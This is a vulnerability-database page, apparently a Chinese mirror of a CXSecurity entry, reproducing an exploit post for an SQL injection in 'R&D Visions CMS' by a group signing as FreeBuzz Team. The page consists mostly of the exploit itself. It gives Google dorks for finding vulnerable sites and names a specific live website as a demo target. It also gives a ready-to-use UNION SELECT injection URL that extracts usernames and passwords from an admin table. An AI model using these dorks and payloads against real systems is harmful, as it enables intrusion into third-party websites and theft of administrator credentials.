R&D Visions CMS - SQL Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1825240 漏洞类型
发布时间 2019-11-17 更新时间 2019-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110115
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
---------------------------------------------------------
# Exploit Title: R&D Visions CMS - SQL Injection Vulnerability
# Date: 2019-11-14
# Exploit Author: FreeBuzz Team
# Vendor Homepage: http://www.websmileindia.com/
# Team Mail : Frb@tutamail.com
# Tested on: Ubuntu
---------------------------------------------------------
Google Dork:
intext:"Website by R&D Visions" inurl:.php?id=
intext:"CMS System by R&D Visions"

-

Demo:
https://www.drunvalo.net/home.php?newid=53[SQLi]

Injection:

https://www.drunvalo.net/home.php?newid=-53+Union+Select+1,Group_ConCat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12+From+admin_user_log--+


----------------------------------------------------------
# Discovered by Unkn0wn[0x9a@protonmail.com]
# https://github.com/0x9a
# We Are : AloneGhost - VeNoM - Agent Haze - Old_One - Unkn0wn
 FreeBuzz Team @ 2012-2019 [FRB]